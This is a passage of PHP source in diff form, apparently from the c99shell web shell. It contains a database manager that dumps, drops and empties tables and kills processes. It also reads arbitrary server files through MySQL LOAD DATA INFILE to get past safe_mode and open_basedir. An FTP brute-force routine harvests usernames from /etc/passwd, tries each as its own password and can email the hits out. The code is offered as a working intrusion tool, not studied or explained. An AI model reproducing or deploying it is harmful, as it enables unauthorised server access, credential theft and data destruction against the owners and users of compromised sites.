LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" 
name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td 
width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtbl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = false; + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; + echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; + $v = join (";",$dmptbls); + echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; + echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; + echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; + 
echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; + echo "</form>"; + } + else + { + $diplay = true; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = true; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; + } + } + else {echo "<b>Dump: nothing to do!</b>";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") 
{$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "<br><br><b>Inserting row into table:</b><br>"; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo 
"<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; + $i++; + } + echo "</table><br>"; + echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; + if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} + echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "<hr size=\"1\" noshade>"; + echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a 
href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} + else {echo "&nbsp;";} + } + if ($i == 0) {echo "empty";} + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; + for ($i=0;$i<mysql_num_fields($result);$i++) + { + $v = mysql_field_name($result,$i); + if ($e[0] == "a") {$s = "d"; $m = "asc";} + else {$s = "a"; $m = "desc";} + echo "<td>"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} + else {echo "<b>".$v."</b><a 
href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} + echo "</td>"; + } + echo "<td><font color=\"green\"><b>Action</b></font></td>"; + echo "</tr>"; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo "<tr>"; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "<font color=\"green\">NULL</font>";} + echo "<td>".$v."</td>"; + $i++; + } + echo "<td>"; + echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." 
LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; + echo "</td>"; + echo "</tr>"; + } + mysql_free_result($result); + echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"deleterow\">Delete</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; + echo "<td>".$row["Rows"]."</td>"; + echo "<td>".$row["Type"]."</td>"; + echo "<td>".$row["Create_time"]."</td>"; + echo "<td>".$row["Update_time"]."</td>"; + echo "<td>".$size."</td>"; + echo "<td>&nbsp;<a 
href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>آ»</b></center></td>"; + echo "<td><center><b>".$i." table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"tbldrop\">Drop</option>"; + echo "<option value=\"tblempty\">Empty</option>"; + echo "<option value=\"tbldump\">Dump</option>"; + echo "<option value=\"tblcheck\">Check table</option>"; + echo "<option value=\"tbloptimize\">Optimize table</option>"; + echo "<option value=\"tblrepair\">Repair table</option>"; + echo "<option value=\"tblanalyze\">Analyze table</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" 
name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } + if (!empty($sql_act)) + { + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 
border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>Processes:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = false; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + 
mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} + else + { + for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} + $f = ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} + if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} + else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "</td></tr></table>"; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; + } + echo "</table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} + elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} + echo "<br><br>"; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>Ftp Quick brute:</b><br>"; + if (!win) {echo "This functions not work in Windows!<br><br>";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$true = (!in_array($sh,array("/bin/false","/sbin/nologin")));} + else {$true = true;} + if ($true) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." 
with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return true; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = false;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. 
connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} + else + { + echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d)); + $gr = 
